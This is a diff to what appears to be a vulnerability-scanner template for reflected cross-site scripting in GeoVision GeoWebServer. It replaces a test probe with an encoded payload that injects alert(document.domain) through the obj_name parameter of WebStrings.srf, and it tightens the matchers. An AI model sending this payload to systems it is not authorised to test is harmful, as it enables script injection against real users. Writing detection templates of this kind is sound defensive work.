--- a/vulnerabilities/other/geovision-geowebserver-xss.yaml
+++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml
@@ -10,7 +10,7 @@ info:
 requests:
   - raw:
       - |
-        GET /Visitor/bin/WebStrings.srf?file=&obj_name=<script>test</script> HTTP/1.1
+        GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
         Accept: */*
@@ -20,9 +20,14 @@ requests:
 
       - type: regex
         regex:
-          - "<script>test</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: status
         status:
           - 200
+
+      - type: word
+        part: header
+        words:
+          - text/html
